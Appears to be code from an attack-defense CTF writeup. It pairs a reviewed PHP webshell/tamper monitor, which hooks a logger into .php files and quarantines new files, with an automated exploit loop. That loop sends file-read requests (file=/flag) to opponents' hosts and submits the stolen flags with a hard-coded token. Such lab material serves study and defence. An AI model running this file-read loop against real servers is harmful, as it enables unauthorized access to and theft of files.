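# Remainder of scandir(startdir): its `def` line lies before this chunk, so
# these statements belong to that function body (walk the tree rooted at
# startdir and hook every .php file whose path does not contain 'log').
os.chdir(startdir)
for obj in os.listdir(os.curdir):
    path = os.getcwd() + os.sep + obj
    if os.path.isfile(path) and '.php' in obj and 'log' not in path:
        modifyip(path, '<?php', '<?php\nrequire_once(\'/var/www/html/log.php\');')
    if os.path.isdir(obj):
        scandir(obj)
os.chdir(os.pardir)


def modifyip(tfile, sstr, rstr):
    """Replace every occurrence of *sstr* with *rstr* in text file *tfile*, in place.

    scandir() uses it to splice a ``require_once`` of the request-logging
    script after each ``<?php`` open tag.  Every line is scanned, including
    the last one: the original iterated ``range(len(lines) - 1)`` and so
    never patched the final line, which meant a one-line PHP file was left
    untouched.  The file is only rewritten when something changed, and both
    handles are closed via ``with`` (the original leaked them).

    Args:
        tfile: path of the file to edit.
        sstr: literal substring to look for (plain ``str.replace``, no regex).
        rstr: replacement text.

    Errors:
        Read/write failures (IOError/OSError) are swallowed so one unwritable
        file does not abort the directory walk.  NOTE(review): the original's
        ``except`` clause is not visible in this chunk; confirm it did not do
        more than ignore the error.
    """
    try:
        with open(tfile, 'r') as fh:
            lines = fh.readlines()
    except (IOError, OSError):
        return
    patched = [line.replace(sstr, rstr) if sstr in line else line for line in lines]
    if patched == lines:
        return  # nothing to do; don't touch the mtime of unaffected files
    try:
        with open(tfile, 'w') as fh:
            fh.writelines(patched)
    except (IOError, OSError):
        pass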
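# Compute the MD5 of every file in the list (files under the script's own
# special directories are skipped).
def getfilemd5dict(filelist=None):
    """Return ``{path: md5}`` for the paths in *filelist*.

    Args:
        filelist: iterable of file paths.  ``None`` (the default) means no
            files.  The original declared a mutable default ``[]``; using
            ``None`` removes the shared-state hazard without changing how
            any existing caller invokes the function.

    Returns:
        dict mapping each path that does not contain ``Special_path_str``
        (module global, presumably the prefix of the bak/log/webshell dirs —
        verify) and whose ``calcMD5()`` result is truthy to that MD5.  A path
        for which ``calcMD5()`` returns something falsy (apparently its way
        of signalling an unreadable or missing file — confirm) is omitted,
        so callers must tolerate missing keys.
    """
    if filelist is None:
        filelist = []
    filemd5dict = {}
    for ori_file in filelist:
        if Special_path_str in ori_file:
            continue  # never hash the monitor's own quarantine/backup dirs
        md5 = calcMD5(os.path.realpath(ori_file))
        if md5:
            filemd5dict[ori_file] = md5
    return filemd5dict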
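# Copy every file in the list into the backup directory so that a tampered
# file can later be restored from it.
def backup_file(filelist=None):
    """Copy each path in *filelist* into ``Special_path['bak']``.

    Args:
        filelist: iterable of file paths.  ``None`` (the default) means no
            files; replaces the original mutable default ``[]`` without
            changing the call signature for existing callers.

    Notes:
        Paths containing ``Special_path_str`` (module global) are skipped so
        the backup does not recursively include itself.  ``shutil.copy2``
        onto a directory stores each file flat under its basename, so two
        files with the same name in different directories overwrite each
        other in the backup.  The restore step in the main loop looks files
        up by basename in that same flat layout, so the layout is deliberately
        left as is (see the TODO there).  Copy errors propagate to the caller,
        as in the original.
    """
    if filelist is None:
        filelist = []
    for filepath in filelist:
        if Special_path_str in filepath:
            continue
        shutil.copy2(filepath, Special_path['bak'])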
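def _read_text(path):
    """Return the text content of *path*, or ``None`` if it cannot be read.

    A ``None`` result covers deleted files (the symmetric difference below
    also yields originals that have been removed) and permission errors.
    The handle is closed via ``with``; the original leaked it.
    """
    try:
        with open(path, 'r') as fh:
            return fh.read()
    except (IOError, OSError):
        return None


def _append_log(message, context):
    """Append *message* as one line to ``Special_path['log']/log.txt``.

    Args:
        message: line to record (written without its trailing newline).
        context: short tag printed if the write fails, e.g. ``'done_diff'``.

    A log failure is reported on stdout together with the exception and then
    ignored, so a broken log file never stops the monitor loop.
    """
    try:
        with open(os.path.join(Special_path['log'], 'log.txt'), 'a') as fh:
            fh.write(message + '\n')
    except (IOError, OSError) as e:
        print(u'[-] log error : ' + context + ': ' + getUnicode(e))


if __name__ == '__main__':
    print(u'---------start------------')
    for value in Special_path:
        mkdir_p(Special_path[value])
    # Snapshot the tree: every file path, its MD5, and a flat backup copy.
    ORIGIN_FILE_LIST = getfilelist(CWD)
    FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
    backup_file(ORIGIN_FILE_LIST)
    # TODO: backups are stored flat by basename, so same-named files in
    # different directories collide in the bak dir (see backup_file()).
    print(u'[*] pre work end!')
    while True:
        file_list = getfilelist(CWD)
        # 1) Quarantine anything that appeared since the snapshot.
        #    set ^ set also yields *deleted* originals; those cannot be opened
        #    and are simply skipped.  The original did `break` on the first
        #    unreadable path, which silently ended the scan and left every
        #    later upload in the same round unchecked.
        diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))
        for filepath in diff_file_list:
            content = _read_text(filepath)
            if content is None:
                continue
            # Special_string is a whitelist marker: a file containing it is
            # trusted and left alone.  NOTE(review): whoever learns the
            # marker can bypass the check by embedding it, so keep it secret
            # and rotate it between rounds.
            if Special_string in content:
                continue
            try:
                print(u'[*] webshell find : ' + getUnicode(filepath))
                shutil.move(filepath, os.path.join(Special_path['webshell'], ntpath.basename(filepath) + '.txt'))
            except Exception as e:
                print(u'[!] move webshell error, "%s" maybe is webshell.' % getUnicode(filepath))
            _append_log('newfile: ' + getUnicode(filepath) + ' : ' + str(time.ctime()), 'file move error')
        # 2) Restore any original file whose content changed.
        md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)
        for filekey in md5_dict:
            # .get(): a file that was unhashable at snapshot time has no entry
            # in FILE_MD5_DICT; indexing raised KeyError and killed the loop.
            if md5_dict[filekey] == FILE_MD5_DICT.get(filekey):
                continue
            content = _read_text(filekey)
            if content is None or Special_string in content:
                continue
            try:
                print(u'[*] file had be change : ' + getUnicode(filekey))
                shutil.move(filekey, os.path.join(Special_path['difffile'], ntpath.basename(filekey) + '.txt'))
                # copy2, not move: the backup must survive so the same file
                # can be restored again after a second tampering.  With move,
                # the second restore failed after the tampered copy had
                # already been taken away, leaving the site file missing.
                shutil.copy2(os.path.join(Special_path['bak'], ntpath.basename(filekey)), filekey)
            except Exception as e:
                print(u'[!] move webshell error, "%s" maybe is webshell.' % getUnicode(filekey))
            _append_log('diff_file: ' + getUnicode(filekey) + ' : ' + getUnicode(time.ctime()), 'done_diff')
        time.sleep(2)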
以其中一个脚本为例, 首先使用上面提到的插件生成代码后粘贴进来, 然后根据题目分布, 写个 for 循环打一遍, 再利用 while True 让程序死循环跑, 如果某个 ip 已经不可以打的话就将其加到 ban 列表里面, 然后每轮输出一共打了几个, 再 sleep(300), 也就是 5 分钟, 比赛是一轮 10 分钟, 一轮打两次避免特殊情况(如打的时候突然宕机等等)
# Flag-collection loop from the writeup: polls the challenge instances
# 10.10.0-10.30, submits whatever it gets back to the event platform, and
# repeats every 5 minutes (two passes per 10-minute round, per the text).
#
# Review notes, kept as comments because the code is left as published:
#  - the submission token is hard-coded in source; a credential like this
#    should come from an environment variable or a file outside the repo.
#  - the bare `except: pass` hides every failure (timeouts, DNS, the
#    platform rejecting a submission) and, in Python 2, also swallows
#    KeyboardInterrupt raised during sleep(1).
#  - a host is added to `ban` after a single response of <= 20 bytes and is
#    never retried; a transient empty reply bans it for the rest of the run.
#  - `print num` / `print r2.text` are Python 2 statements.
import requests
from time import sleep
session = requests.Session()
ban = []  # instance indices that returned too little data; never retried
while True:
    num = 0  # successful submissions in this pass
    for i in range(11):
        if i in ban:
            continue
        url = "http://10.10.%d.30/index.php" % i
        #print url
        # Query parameters and browser-like headers the writeup uses against
        # the challenge's show_pic endpoint.
        paramsGet = {"a":"show_pic","c":"index","file":"/flag"}
        headers = {"Cache-Control":"no-cache","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36","Connection":"close","Pragma":"no-cache","Accept-Encoding":"gzip, deflate","Accept-Language":"zh,zh-CN;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6"}
        try:
            # 1-second timeout: a slow instance raises and is silently skipped
            # this pass (it is NOT banned, unlike a short reply).
            response = session.get(url, params=paramsGet, headers=headers, timeout=1).content.strip()
            if len(response) > 20:
                # The whole response body is posted as the flag; the platform
                # decides whether it is valid ("success" in its reply).
                r2 = requests.post('http://10.66.66.66/api/v1/ad/web/submit_flag/?event_id=1',data={"flag": response,"token":"dzVaFmggB2WXHDjwMGug8uXi7TTRBEBNxZxHGCngJskgm"})
                print r2.text
                if "success" in r2.text:
                    num += 1
                #print(response)
            else:
                if i not in ban:
                    ban.append(i)
            sleep(1)
        except:
            pass
    print num
    sleep(300)